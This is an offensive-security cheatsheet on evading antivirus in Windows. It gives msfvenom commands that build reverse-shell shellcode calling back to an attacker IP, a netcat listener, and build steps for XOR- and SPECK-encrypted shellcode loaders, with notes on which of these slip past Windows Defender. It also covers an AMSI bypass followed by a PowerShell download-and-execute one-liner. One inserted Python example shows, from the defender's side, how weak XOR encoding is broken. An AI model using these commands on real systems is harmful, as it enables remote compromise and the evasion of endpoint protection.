Evasion basics cheatsheet

Warning

Work in progress

Windows

Simple shellcode loader

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.11 LPORT=4444 -f c
nc -nlvp 4444
# on redtools/windows/shellcode-loader
x86_64-w64-mingw32-g++ runner.cpp -o runner.exe -static-libgcc -static-libstdc++ -static
.\runner.exe

Very basic; detected by every up-to-date system with standard protection enabled.

XORed shellcode loader

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.11 LPORT=4444 -f hex -o /tmp/shell_reverse_tcp.hex
# on redtools/utils/
python xor_encoder.py -s /tmp/shell_reverse_tcp.hex -k 5A -f cpp
# on redtools/windows/xor-shellcode-loader
# replace payload variable value
x86_64-w64-mingw32-g++ runner.cpp -o runner.exe -static-libgcc -static-libstdc++ -static -nostartfiles -Wl,--entry,start -Wl,--subsystem,windows

Same outcome as above: still detected with plain Windows Defender protection enabled.
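Why a single-byte XOR only defeats naive string matching, shown from the analyst's side. This is an added example, not code from redtools or this page: it brute-forces all 256 one-byte keys against a constructed stand-in blob (not real shellcode), using the literal strings "ws2_32" and "cmd" that metasploit's reverse_tcp shell payloads carry as known plaintext, and shows that byte entropy is unchanged by the encoding.

```python
import re
from collections import Counter
from math import log2

# Known-plaintext markers: metasploit's windows reverse_tcp shell payloads push
# the strings "ws2_32" and "cmd" while resolving imports, so the one-byte key
# that exposes them is the right one.
MARKERS = (b"ws2_32", b"cmd\x00")

# Constructed sample, NOT real shellcode: opaque filler bytes around the two
# markers, standing in for a msfvenom blob.
SAMPLE_PLAIN = (b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00" + b"ws2_32\x00"
                + b"\x41\x51\x41\x50\x52\x51" + b"cmd\x00" + bytes(range(0x20, 0x30)))


def xor_single(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; a one-byte XOR permutes byte values, so this is unchanged."""
    n = len(data)
    return -sum(c / n * log2(c / n) for c in Counter(data).values())


def parse_c_array(source: str) -> bytes:
    """Extract bytes from a `{ 0x1a, 0x2b, ... }` or "\\x1a\\x2b" C/C++ initialiser,
    the form an encoder's -f cpp output takes."""
    return bytes(int(h, 16) for h in re.findall(r"(?:0x|\\x)([0-9a-fA-F]{2})", source))


def brute_force_xor(blob: bytes) -> list[tuple[int, list[bytes]]]:
    """Try all 256 single-byte keys; report each key that exposes a known marker."""
    hits = []
    for key in range(256):
        found = [m for m in MARKERS if m in xor_single(blob, key)]
        if found:
            hits.append((key, found))
    return hits


if __name__ == "__main__":
    encoded = xor_single(SAMPLE_PLAIN, 0x5A)  # same key as the cheatsheet's -k 5A
    # Constructed equivalent of an encoder's C++ array output for this blob.
    source = "unsigned char payload[] = { " + ", ".join(f"0x{b:02x}" for b in encoded) + " };"
    blob = parse_c_array(source)
    print(f"entropy plain={shannon_entropy(SAMPLE_PLAIN):.2f} encoded={shannon_entropy(blob):.2f}")
    for key, found in brute_force_xor(blob):
        print(f"key 0x{key:02x} exposes {found}")
```

Run against a loader's source, the key and the original strings fall out in well under a second, which is why the page's next step moves to a real cipher.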

SPECK encrypted shellcode loader

# on redtools/utils
# replace payload variable value
go run speck_encrypt.go
# on redtools/windows/speck-shellcode-loader/go
# replace shellcodeEncrypted variable value with the one generated with speck_encrypt.go
GOOS=windows GOARCH=amd64 go build -o runner.exe main.go

Using this encryption method, it bypasses basic Windows Defender protection but does nothing against dynamic analysis.

AMSI Bypass

# initial test
Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
Invoke-Mimikatz

https://amsi.fail/ Generate a payload and paste it into the current PowerShell context. Retry the initial test.

Now run your .ps1:

IEX(New-Object Net.WebClient).downloadString('http://10.0.0.11:8000/winPEAS.ps1')